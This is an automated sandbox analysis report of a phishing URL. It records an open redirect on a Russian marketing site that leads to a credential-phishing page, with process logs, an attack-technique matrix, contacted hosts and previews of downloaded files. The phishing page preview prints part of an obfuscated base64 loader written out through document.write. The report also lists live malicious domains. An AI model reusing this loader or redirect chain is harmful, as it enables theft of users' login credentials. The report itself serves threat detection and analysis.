Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: classification engineClassification label: mal52.win@20/41@34/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2000,i,6516994381047898085,9039193171606525474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2000,i,6516994381047898085,9039193171606525474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/0%Avira URL Cloudsafe
https://or.smelsgycz.ru/favicon.ico100%Avira URL Cloudphishing
https://cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru/hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY100%Avira URL Cloudmalware
https://or.smelsgycz.ru/OP4lIHE/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru
172.67.139.11
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.130.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          high
          or.smelsgycz.ru
          172.67.139.29
          truetrue
            unknown
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              www.google.com
              142.250.181.68
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  pixelpromo.ru
                  93.188.41.36
                  truefalse
                    unknown
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      www.pixelpromo.ru
                      unknown
                      unknownfalse
                        unknown
                        cdn.graph.office.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/false
                            • Avira URL Cloud: safe
                            unknown
                            https://cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru/hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREYfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://or.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comtrue
                              unknown
                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlrfalse
                                  high
                                  https://a.nel.cloudflare.com/report/v4?s=4EyngLd2fJaB82tWFgYpHbGqFWSVHVHs38o7MhS9gAy%2BtvEJVbrqUjwnljvvp7h%2FYT%2Bbr1t6nsc5eMWjheLMxMhgs8amKl5bBPSRYo6DX94itmI4W1dQ7M4XOyCKRw%3D%3Dfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ef3a85b7bfe0fa7&lang=autofalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                        high
                                        https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.jsfalse
                                          high
                                          https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.2.12.min.jsfalse
                                            high
                                            https://or.smelsgycz.ru/favicon.icofalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ef3a85b7bfe0fa7/1733733287497/1a249dc184e71a3ea7313891d85ea4fba010f01b95f1dec42eb842b16d56505f/NapXGCKZtuSC1UIfalse
                                              high
                                              https://or.smelsgycz.ru/OP4lIHE/true
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/false
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4false
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  13.107.246.63
                                                  s-part-0035.t-0009.t-msedge.netUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.18.94.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.21.32.251
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.18.95.41
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.130.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  172.67.139.11
                                                  cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ruUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  172.67.139.29
                                                  or.smelsgycz.ruUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  142.250.181.68
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  93.188.41.36
                                                  pixelpromo.ruRussian Federation
                                                  44964DAPLDATAPLANETLtdRUfalse
                                                  151.101.194.137
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  104.17.25.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.4
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1571319
                                                  Start date and time:2024-12-09 09:33:30 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 2m 56s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal52.win@20/41@34/14
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 64.233.162.84, 172.217.19.238, 172.217.19.163, 172.217.17.46, 199.232.210.172, 192.229.221.95, 20.20.44.224, 20.20.44.160, 20.20.44.97, 2.20.40.227, 2.20.41.218, 104.102.52.161, 172.217.17.35
                                                  • Excluded domains from analysis (whitelisted): developer.microsoft.akadns.net, slscr.update.microsoft.com, e12688.dscg.akamaiedge.net, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, graph.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, cdn.graph.office.net.edgekey.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, update.googleapis.com, developer.microsoft.com-c.edgekey.net.globalredir.akadns.net, e2921.dscb.akamaiedge.net, developer.microsoft.com, ags.privatelink.msidentity.com, www.tm.prd.ags.akadns.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com, developer.microsoft.com-c.edgekey.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, www.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com
                                                  No simulations
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                  Category:downloaded
                                                  Size (bytes):171505
                                                  Entropy (8bit):5.043804815226508
                                                  Encrypted:false
                                                  SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                  MD5:8F186BBA557DC6140841C682AF4D60EE
                                                  SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                  SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                  SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                  Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:dropped
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (38764)
                                                  Category:downloaded
                                                  Size (bytes):159173
                                                  Entropy (8bit):5.3297142712650905
                                                  Encrypted:false
                                                  SSDEEP:3072:ZDziV+dwHl6/xvv8ij5frAMPWzlzU4wd2rw:xwq8dzU4w5
                                                  MD5:3F0E36351D1FAB460D9E7C4D595C4976
                                                  SHA1:43A8B2CF0CBB6B74979245B422BD2A72E71FA6E1
                                                  SHA-256:B255C13793B75CC91AE652E26F7BCC57A492CAF920A1CE3378F3144EBA49C1B9
                                                  SHA-512:624EFD83CD5A260452F3BE5F9887EC837821F86D85C7865EC4E12347635779BDB9B029098D5BF884690BA4C0C0E52451F753FE997E3E0C0699C17F3EB50AAB65
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.graph.office.net/prod/css/Moray/v2.20.0/bundle.min.js
                                                  Preview:/*!. * MWF (Moray) v2.20.0. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).mwf={})}(this,(function(t){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function s(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}var i=function(t){return t&&t.Math==Math&&t},n=i("object"==typeof globalThis&&globalThis)||i("object"==typeof window&&window)||i("object"==typeof self&&self)||i("object"==typeof e&&e)||function(){return this}()||e||Function("return this")(),o={},l=function(t){try{return!!t()}catch(t){return!0}},r=!l((func
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:1
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (7489), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):19888
                                                  Entropy (8bit):5.881048873107839
                                                  Encrypted:false
                                                  SSDEEP:384:vnuF9Pt5ZXAyR4rR221alFlatwBnuF9Pt5ZXAyR4rR221alFlaRlrVslrVR:Et5ZBR4suMHatwmt5ZBR4suMHaRlrVst
                                                  MD5:AB60F31624AA7425BE0F6C82972CA870
                                                  SHA1:581BF22AF8C92957FEA124C85B65C5036E69F93F
                                                  SHA-256:F3258F47493AFBD4FCD9343226CD42A0B3F17E4429C01215A150054B867FC376
                                                  SHA-512:9C1E584E1E9818DFAF15B70B0A11306CF63453FADE2301F54C6B2808CAB9B7AC5A1BBA878820F884F82ECA4B27BDC812C46F606219241BF256717D2B9B95F766
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://or.smelsgycz.ru/OP4lIHE/
                                                  Preview: Never give in except to convictions of honor and good sense. -->....<script>../* The way to get started is to quit talking and begin doing. */..if(atob("aHR0cHM6Ly9VWi5zbWVsc2d5Y3oucnUvT1A0bElIRS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (29004)
                                                  Category:dropped
                                                  Size (bytes):29206
                                                  Entropy (8bit):5.501059907569595
                                                  Encrypted:false
                                                  SSDEEP:384:eR0+Q3D13T8BynBDyd56wT2bey6aShwBFz94EhEJkUabHWj/TfYBZvcQEwHdnvgU:XpXIJT2bed+BFzuDaij/TfGR1Cxb2
                                                  MD5:57C904512A0D4846547C39317C3CCDA8
                                                  SHA1:C9425673534A00EC7FF6A688C6673EDBF976F135
                                                  SHA-256:4A1450902E0E37F309F9338FA42BFFCD090CF499EAD18845627741F7868481B7
                                                  SHA-512:8ABED572751DEBEF6A36E2C9995CE885D7CC31EBDDE9B17E876E50460DC39DC0A9126AF481B87DE9C0A6065D28934B6EF259D6C6E1E891B57C1E181C2CC21645
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*!. * 1DS JS SDK Privacy Guard plugin, 3.2.12. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,n=function(e){"use strict";var k="function",U="object",a="undefined",r="prototype",V="hasOwnProperty",t=Object,B=t[r],n=(t.create,t.defineProperty),R=B[V],X=null;function G(e){e=!1===(e=void 0===e||e)?null:X;return e||((e=(e=(e=typeof globalThis!==a?globalThis:e)||typeof self===a?e:self)||typeof window===a?e:window)||typeof global===a||(e=global),X=e),e}function W(e){throw new TypeError(e)}(G()||{}).Symbol,(G()||{}).Reflect;var H=function(e,n){return(H=t.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,n){e.__proto__=n}:function(e,n){for(var t in n)n[V](t)&&(e[t]=n[t])}))(e,n)},i="undefined",z="constructor",g="prototype",K="function",j="_dynInstFuncs",Z="_isDynProxy",p="_dynClass",q="_dynInstChk",J=q,$="_dfOpts",Q="_unknown_",Y="__proto__",ee="_dyn"+Y,o="__dynProto$Gbl",ne="_dynInstProto",te="useBaseInst",re="setInstFuncs
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:downloaded
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru/hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY
                                                  Preview:1
